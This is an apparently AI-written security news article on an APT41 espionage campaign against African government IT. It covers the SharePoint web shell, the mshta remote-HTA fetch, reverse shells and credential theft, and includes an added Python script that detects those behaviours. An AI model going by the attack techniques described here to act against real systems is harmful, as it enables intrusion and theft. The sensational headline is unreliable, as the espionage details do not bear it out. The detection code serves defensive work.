Ethical Hacking News

China-Linked Hackers Unleash Sophisticated Espionage Campaign on African IT Infrastructure, Leaving Trail of Destruction



A highly sophisticated espionage campaign has been attributed to APT41. The attackers relied on custom-built tools and living-off-the-land tactics and focused on government IT services in Africa.

  • African government IT services have been targeted by Chinese nation-state hackers.
  • The attackers are believed to be part of the APT41 group, a prolific Chinese hacking collective.
  • The operation is notable for its focus on Africa, which has previously been relatively unscathed by APT41's activities.
  • The attack used a combination of hardcoded names and IP addresses, as well as custom-built tools, to bypass traditional security measures.
  • Living-off-the-land tactics were employed, using trusted services like SharePoint to turn them into covert control channels.
  • Credential-harvesting utilities and stealers were used to gather sensitive data and exfiltrate information via the SharePoint server.

    In a shocking revelation, Chinese nation-state hackers have been identified as the masterminds behind a highly sophisticated espionage campaign targeting government IT services in the African region. According to Kaspersky researchers Denis Kulik and Daniil Pogorelov, the attackers used hardcoded names of internal services, IP addresses, and proxy servers embedded within their malware, further highlighting the brazen nature of this operation.

    The APT41 group, a prolific Chinese hacking collective known for its widespread targeting of organizations across multiple sectors, has been linked to this latest campaign. With a history of infiltrating telecom and energy providers, educational institutions, healthcare organizations, and IT energy companies in more than three dozen countries, it's no surprise that the attackers have set their sights on the African region.

    What makes this operation particularly noteworthy is its focus on Africa, which has been relatively unscathed by APT41's previous activities. As noted by Kaspersky, "the continent had experienced the least activity" from this specific threat actor until now. This shift in attention suggests a more deliberate and targeted approach, one that could potentially leave a lasting impact on the region's critical infrastructure.

    The investigation began with suspicious activity on multiple workstations associated with an unnamed organization's IT infrastructure. The researchers discovered that the attackers were running commands to check the availability of their command-and-control (C2) server, either directly or via an internal proxy server within the compromised entity. This initial reconnaissance phase laid the groundwork for the subsequent stages of the attack.

    The attackers then harvested credentials associated with privileged accounts to facilitate privilege escalation and lateral movement, ultimately deploying Cobalt Strike for C2 communication using DLL side-loading. The malicious DLLs incorporated a check to verify the language packs installed on the host and proceeded with execution only if certain languages were not detected.

    One notable aspect of this operation is the use of a hacked SharePoint server for C2 purposes. The attackers distributed files named agents.exe and agentx.exe via the SMB protocol to communicate with the server, each of which was actually a C# trojan whose primary function was to execute commands it received from a web shell named CommandHandler.aspx.

    The attack also highlighted the use of custom-built tools alongside publicly available ones. Specifically, the attackers utilized penetration testing tools like Cobalt Strike at various stages of an attack, further emphasizing their adaptability and creativity in bypassing traditional security measures.

    Furthermore, the attackers employed living-off-the-land tactics, leveraging trusted services like SharePoint and turning them into covert control channels. These behaviors map to MITRE ATT&CK techniques including T1071.001 (Application Layer Protocol: Web Protocols) and T1047 (Windows Management Instrumentation). Because they ride on trusted services and native Windows tooling, they are hard for detection teams focused on lateral movement, credential access, and defense evasion to distinguish from legitimate activity across Windows environments.

    The threat actors were also observed carrying out follow-on activity on machines deemed valuable after the initial reconnaissance. This was accomplished by running a cmd.exe command that downloaded a malicious HTML Application (HTA) file containing embedded JavaScript from an external resource and executed it with mshta.exe.

    The nature of the payload delivered via the external URL, which impersonated GitHub ("github.githubassets[.]net"), remains unknown. However, analysis of one previously distributed script revealed that it was designed to spawn a reverse shell, thereby granting the attackers the ability to execute commands on the infected system.
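    Two of the behaviours described above, the cmd.exe-to-mshta.exe chain fetching a remote HTA and HTTP requests to a web shell named CommandHandler.aspx on the SharePoint server, are easy to hunt for in ordinary telemetry. The following detection script is an added example, not code from the article or from Kaspersky's report; the process-creation events, IIS log lines, client IPs and the updates.example.invalid URL are constructed sample data.

```python
import re

# Constructed sample telemetry (not from the article or Kaspersky's report).
# Process-creation events in Sysmon Event ID 1 style: (parent image, image, command line).
PROCESS_EVENTS = [
    ("C:\\Windows\\System32\\cmd.exe", "C:\\Windows\\System32\\mshta.exe",
     "mshta.exe https://updates.example.invalid/ui.hta"),        # remote HTA launched from cmd.exe
    ("C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\mshta.exe",
     "mshta.exe C:\\Program Files\\Vendor\\setup.hta"),          # local HTA, treated as benign here
    ("C:\\Windows\\System32\\services.exe", "C:\\Windows\\System32\\svchost.exe",
     "svchost.exe -k netsvcs"),
]

# IIS W3C-style lines from the SharePoint front end: date time method uri status client-ip.
IIS_LOG = """\
2025-07-21 10:01:02 GET /_layouts/15/start.aspx 200 10.0.0.5
2025-07-21 10:01:09 POST /_layouts/15/CommandHandler.aspx 200 10.0.0.17
2025-07-21 10:03:44 POST /_layouts/15/CommandHandler.aspx 200 10.0.0.23
"""

REMOTE_HTA = re.compile(r"\bhttps?://\S+\.hta\b", re.IGNORECASE)
WEB_SHELL = "commandhandler.aspx"  # web shell file name reported in the campaign


def detect_remote_hta(events):
    """Flag mshta.exe executing an HTA fetched over HTTP(S); a cmd.exe parent,
    the chain seen in this campaign, raises the severity."""
    findings = []
    for parent, image, cmdline in events:
        if image.lower().endswith("\\mshta.exe") and REMOTE_HTA.search(cmdline):
            severity = "high" if parent.lower().endswith("\\cmd.exe") else "medium"
            findings.append({"rule": "remote_hta", "severity": severity, "cmdline": cmdline})
    return findings


def detect_web_shell_traffic(log_text, shell_name=WEB_SHELL):
    """Return {client_ip: [methods]} for every request whose path ends in the web shell
    file name, so the operator hosts talking to the SharePoint C2 stand out."""
    clients = {}
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 6:
            continue  # skip malformed lines
        _date, _time, method, uri, _status, client = parts
        if uri.rsplit("/", 1)[-1].lower() == shell_name:
            clients.setdefault(client, []).append(method)
    return clients


if __name__ == "__main__":
    print(detect_remote_hta(PROCESS_EVENTS))
    print(detect_web_shell_traffic(IIS_LOG))
```

Pointing the two functions at real Sysmon and IIS exports instead of the inline samples is the only change needed to run this against production data.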

    Additionally, the attackers employed stealers and credential-harvesting utilities to gather sensitive data and exfiltrate details via the SharePoint server. The tools deployed by the adversary included Pillager (albeit a modified version), Checkout, RawCopy, and Mimikatz, which were utilized to acquire information about downloaded files, credit card data saved in web browsers, raw registry files, and account credentials.

    The overall impact of this operation underscores the evolving nature of modern cybersecurity threats. As threat actors continually adapt and refine their tactics, it is essential for organizations to stay vigilant and proactive in defending against such attacks.

    In summary, the recent espionage campaign attributed to APT41 highlights the growing concern of Chinese nation-state hackers targeting government IT services in Africa. The use of sophisticated tools, living-off-the-land tactics, and a focus on the African region underscores the complexity and adaptability of modern cyber threats.

    Related Information:
  • https://www.ethicalhackingnews.com/articles/China-Linked-Hackers-Unleash-Sophisticated-Espionage-Campaign-on-African-IT-Infrastructure-Leaving-Trail-of-Destruction-ehn.shtml

  • https://thehackernews.com/2025/07/china-linked-hackers-launch-targeted.html


  • Published: Mon Jul 21 18:21:03 2025 by llama3.2 3B Q4_K_M

    © Ethical Hacking News. All rights reserved.